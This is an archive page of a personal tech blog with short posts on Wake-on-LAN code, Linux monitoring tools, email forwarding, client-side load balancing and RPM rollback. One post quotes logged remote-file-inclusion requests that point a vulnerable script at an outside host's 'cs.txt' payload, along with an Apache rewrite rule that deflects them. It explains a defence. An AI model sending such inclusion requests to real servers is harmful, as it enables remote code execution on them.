Archive for category Geek Stuff

I deal with computers and large systems on a daily basis and consider myself a pretty knowledgeable guy when it comes to this subject. I do recognize that there are a lot of things that I have ‘heard’ about, but don’t really know much about. One such subject is the whole ‘Wake-on-LAN’ functionality that has been built into computers and operating systems for the last few years, yet remains a mystery to many folks.

Wake on LAN (WOL, sometimes WoL) is an Ethernet computer networking standard that allows a shut-down computer to be booted remotely.

Okay, I know that, but how do I actually implement it?

Today, I came across an article that details exactly how to use this feature on a PC running Windows, or on a Mac. Lifehacker’s feature story titled “Access Your Computer Anytime and Save Energy with Wake-on-LAN” is one of the best primers on how to set this up and actually use it. I have multiple computers on my home network that go into ‘sleep mode’ when not used for extended periods of time, and being able to wake them up remotely to use services on them would be of great use to me. Being able to remotely ‘turn on’ a computer that has been shut down would be of tremendous use too, especially for computers that won’t return to their last power state after a power failure.
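Under the hood, the ‘wake’ is just a single UDP broadcast of a so-called magic packet: six 0xFF bytes followed by the target machine’s MAC address repeated 16 times. Here’s a minimal Python sketch; the MAC address in the comment is a placeholder, not a real machine:

```python
import socket

def make_magic_packet(mac):
    """Build the WOL 'magic packet': six 0xFF bytes followed by the
    target MAC address repeated 16 times (102 bytes in total)."""
    mac_bytes = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(mac_bytes) != 6:
        raise ValueError("expected a 6-byte MAC address")
    return b"\xff" * 6 + mac_bytes * 16

def send_magic_packet(mac, broadcast="255.255.255.255", port=9):
    """Send the magic packet as a UDP broadcast; ports 9 (discard)
    and 7 (echo) are the conventional choices."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.sendto(make_magic_packet(mac), (broadcast, port))

# e.g. send_magic_packet("00:11:22:33:44:55")
```

Calling this from any machine on the LAN should wake the box with that MAC, provided WOL is enabled in the target’s BIOS and network adapter settings.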

With today’s introduction of Amazon’s Kindle e-book reader, I’ve decided that there are two products that would cover all my personal entertainment needs this year. The new Amazon Kindle is simply amazing, and would be the single biggest reason I could get back into reading books other than technical manuals. The iPod Touch would provide all my video, podcasting and music needs, all in one small package. So, if anyone is feeling generous this year, I’m also providing a couple handy links where you can purchase these items for someone you love.

I’m currently in the midst of building a new workstation to replace the one I’ve been using at home for almost 5 years now. While I currently run Windows XP, I’ll probably give Windows Vista Ultimate Edition a shot on the new box. As such, I’m always on the lookout for cool little ‘eye candy’ that could make my Vista experience a better one. My good friend Dan pointed me to something he came across:

While doing some regular maintenance on some websites I manage, I came across some interesting entries in the logs for one of our servers: hundreds and hundreds of requests like the following, originating from a wide variety of IPs:

GET /modules.php?op=http://cherrygirl.h18.ru/images/cs.txt?
GET /modules.php?op=http://amyru.h18.ru/images/cs.txt?

Basically, there are a bunch of 'infected' web servers out there which are trying to get our server to execute code stored in a file on a remote server. The file in the cases above is named 'cs.txt'. You can see the contents of the script/file by reading Dan Langille's sanitized version of the attack script.

While our server was not vulnerable to the attack, I was getting very annoyed with having to respond to the script each time it hit our server with a request. Our server had to run some code, determine that the page didn't exist, produce a page explaining to a normal user why their request could not be completed, and so on. Then it hit me: why are we spending all this precious CPU time on these attackers? Why not have them waste their own CPU time? And that's when I decided that the attack script should attack itself. In simple terms, when our web server notices an attack coming in, it simply redirects the request back to the originating server. In essence, it's like requesting a webpage from a server, being told that the page has moved, and being given a new address to go to. In this case, the new address is http://127.0.0.1. Without getting too technical, that's called a loopback address, a network standard address which always points back to the machine making the request.

Here's what I put in httpd.conf, the Apache web server's configuration file, on the Linux server I wanted to modify:
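The gist of it is a mod_rewrite rule along these lines (a sketch, assuming mod_rewrite is loaded; the pattern simply matches the 'cs.txt?' string seen in the attack requests):

```apache
# Any request whose query string contains 'cs.txt?' is answered with
# a 301 Moved Permanently pointing back at the loopback address.
RewriteEngine On
RewriteCond %{QUERY_STRING} cs\.txt\? [NC]
RewriteRule .* http://127.0.0.1/ [R=301,L]
```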

So now, whenever a request comes in which contains the string 'cs.txt?' in the URL, I inform the requester that the file they are requesting has been permanently moved to 'http://127.0.0.1', the loopback address and, in essence, itself.

While the hits on the server continue, I have noticed they have slowed down, presumably because the remote server is busy talking to itself for a moment. I also have the satisfaction of knowing our server isn't wasting its time on these trojan hits, and is letting them talk to themselves for a bit instead.

Yesterday, I posted about how htop was my new replacement for top on all Linux systems I manage. Tonight, while looking through the Google search words that led people to my site, I found a Google result page which contained a 'hit' that immediately caught my eye. Mike Malone, of the I'm Mike blog, had an entry titled 'Top 5 tops: keep tabs on your system'. In it, he describes not only the htop utility I came across earlier, but four additional tops to make any Linux administrator smile.

mtop (MySQL top) monitors a MySQL server showing the queries which are taking the most amount of time to complete. Features include 'zooming' in on a process to show the complete query, 'explaining' the query optimizer information for a query and 'killing' queries. In addition, server performance statistics, configuration information, and tuning tips are provided.

Apachetop is a curses-based top-like display for Apache information, including requests per second, bytes per second, most popular URLs, etc.

iftop does for network usage what top does for CPU usage. It listens to network traffic on a named interface and displays a table of current bandwidth usage by pairs of hosts. Handy for answering the question "why is our ADSL link so slow?".

While I use mtop on a regular basis, and have now started using htop, the other three monitors definitely look like they're going to be part of my 'tools' for the various servers I manage. iftop and apachetop seem especially interesting to me, given their more specialized monitoring targets.

Every now and then, Sun's Research group comes out with something that seems very interesting and leaves me wondering if this is the direction we might be heading in. It's difficult to describe Sun Labs Lively Kernel, so I'll simply quote from their website:

The Sun Labs Lively Kernel is a novel web programming environment developed by Project Flair at Sun Labs. The main goal of the Lively Kernel is to bring the same kind of simplicity, generality and flexibility to web programming that we have known in desktop programming for thirty years, but without the installation and upgrade hassles that conventional desktop applications have.

Remember all those rumors about how Google was developing an OS which would run in a browser? Well, this is the closest thing that I've seen to such a beast. When you visit the Sun Labs Lively Kernel page, click on the 'Enter Lively Kernel' tab to see the prototype in action. While performance was slow for me, it gives you a good idea of where we could be heading in the future.

This person doesn't seem to understand the difference between a phone number and a domain name. Domain names are actual entities, bought and owned by a person or a company. The key word is owned. You don't 'own' an email address; in essence, you're 'renting' it! If you stop paying, or you move elsewhere, do you really expect the owner to keep handling your e-mail? Even the Postal Service doesn't do this! They'll forward your mail for a few weeks until you notify everyone, and then they're done and out of the loop.

Also, think about the inefficiencies of such a requirement. Over time, someone could change email addresses 2, 3, maybe even 5 times. Say I send an email with a 10 MB attachment to address #1. According to this petition, the email sent to address #1 would be forwarded to address #2, then from there to address #3, and so on until it reaches address #5. My email has been handled by 5 different ISPs, and each of them had to absorb the cost of moving my bytes over to the next one. Absolutely ridiculous if you ask me.

I'm all for asking ISPs to do something like this for a very short period of time, just like the Postal Service. But I would do it somewhat differently. Instead of burdening the ISPs with handling large volumes of potentially large pieces of mail, why not have them issue a 'bounce' back to the sender, with a small note indicating the recipient has 'moved', along with his/her new email address? We're now talking about an email of 1,000 to 2,000 bytes, instead of megabytes. We avoid forwarding spam, and if the sender's address doesn't exist, no second bounce is issued, avoiding a mail loop. I know of a few ISPs that already do this as a courtesy to customers who have decided to move on. That's just good business if you ask me; never ignore an ex-client, because they might want to come back in the future.
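To make the idea concrete, here's a rough Python sketch of the bounce-instead-of-forward logic. The addresses and the two lookup tables are made up for illustration; a real ISP would consult its customer database and mail queue instead:

```python
# Hypothetical tables: customers who moved, and senders we know exist.
MOVED = {
    "alice@old-isp.example": "alice@new-isp.example",
}
KNOWN_SENDERS = {"bob@sender.example"}

def handle_incoming(sender, recipient):
    """Decide what to do with a message: 'deliver', 'bounce', or 'drop'."""
    if recipient not in MOVED:
        return "deliver", ""
    if sender not in KNOWN_SENDERS:
        # Unknown or forged sender: stay silent, so two bouncing
        # servers can never get into a mail loop.
        return "drop", ""
    note = "Recipient has moved; new address: " + MOVED[recipient]
    return "bounce", note  # a 1-2 KB notice instead of the full message
```

The bounce carries only the new address, so a 10 MB attachment never has to cross more than one ISP.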

So instead of petitioning for e-mail address portability, we should be asking ISPs to implement some sort of email 'address' forwarding/bounce functionality. It's cleaner, more efficient, and much less of a burden on ISPs and the infrastructure as a whole.

So you’re writing a large web application, with multiple web servers on the front end waiting to serve your users. The first thing you do is start to think about a load balancing solution, be it a hardware solution such as a Coyote Point Systems box, or even a ‘software’ solution, such as round-robin DNS. Now, with the advent of ‘Web 2.0’, we’re slowly seeing another ‘solution’ starting to gain some traction: client-side load balancing.

To put it simply, we let each ‘client’ decide which server to connect to. Each client has a list of all available servers, and randomly selects one and attempts to exchange data. If the client receives a message indicating the server is busy, or no response at all within a set period of time, it moves to another server on the list until it can complete its transaction. Lei Zhu, a contributor at Digital Web, has this to say about the advantages of such a solution:

Distribute loads among a cluster of application servers. Since the client randomly selects the server it connects to, the loads should be distributed evenly among the servers.

Handle failover of an application server gracefully. The client has the ability to failover to another server when the chosen server does not respond within a preset period of time. The application server connection seamlessly fails over to another server.

Ensure the cluster of servers appears to the end user as a single server. In the example, the user simply points a browser to http://www.myloadbalancedwebsite.com/. The actual server used is transparent to the user.
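The client-side selection and failover described above can be sketched in a few lines. Everything here, function names and server names alike, is illustrative rather than taken from Lei's article:

```python
import random

def fetch_with_failover(servers, fetch, timeout=2.0):
    """Pick a server at random and fail over down the shuffled list.

    `servers` is the list shipped to each client; `fetch` is any
    callable taking (server, timeout) that returns a response, or
    raises when the server is busy or doesn't answer in time.
    """
    candidates = list(servers)
    random.shuffle(candidates)  # random choice spreads load evenly
    for server in candidates:
        try:
            return fetch(server, timeout)
        except Exception:
            continue  # busy or timed out: try the next server
    raise RuntimeError("no server in the list responded")
```

A client that gets no answer from its first pick silently moves on to the next, which is exactly why the cluster appears to the end user as a single server.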

A big advantage to such a solution is that you don’t need to spend money on a hardware device, at least in the short-term. You can have some code on your back-end that monitors the web servers and removes any unavailable servers from the server list sent to each client.

Another advantage that Lei points out is that the web servers can be distributed anywhere geographically. Sure, this can be done with a load balancer, but it’s a far trickier and more complicated setup than just having to change a server entry in a file sent to each client.

Lei’s article also includes a short write-up of an application, Voxlite, using such a design.

Overall, while I still have some doubts regarding the scalability of such a solution, it’s an interesting use of Web 2.0.

I use a MySQL database in most, if not all, my website development projects. In some cases, especially with applications/sites that tend to get a large number of hits (and as such, a greater number of interactions with the database), it’s nice to be able to see what the DB engine is doing, how many threads are running, etc. My tool of choice has been MyTop by Jeremy Zawodny for a couple years now. Recently, it looks like someone wanting to learn some Ajax has decided to port Jeremy’s great tool over to an ajaxified webpage! No need to login to the database server and run mytop in a console anymore; now I can do it straight from a web browser!

My good friend Scott reminded me of an old site we had found a while back when we needed to whip up one of those browser favicons for a project we were assigned to. A browser favicon is basically that little logo/image you see next to the URL when you go to certain sites. It’s also used as the logo when you save any page on such a site as a bookmark.

This online tool enables you to upload any image and it will convert it to the favicon format on the fly. It’s a great timesaver when you don’t want to start from scratch and want to get something you can tweak to your liking.

There’s a little-known option in RPM that enables the rollback of package installs. Think of it like an undo option in your favorite application; it will roll back the package install to a previously known state/version. Yum supports this option in Fedora Core 4 (and the upcoming Core 5); here’s an excerpt taken from Chris Tyler’s posting on OreillyNet:

Here are cut-to-the-chase directions on using this feature:

To configure yum to save rollback information, add the line tsflags=repackage to /etc/yum.conf.

To configure command-line rpm to do the same thing, add the line %_repackage_all_erasures 1 to /etc/rpm/macros.
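Once repackaging is on, later transactions can be undone with rpm’s --rollback flag, which takes a time specification; something along these lines (the time string is just an example, and it only works for transactions performed after the settings above were in place):

```shell
# Undo every package transaction performed in the last hour.
rpm -Uvh --rollback '1 hour ago'
```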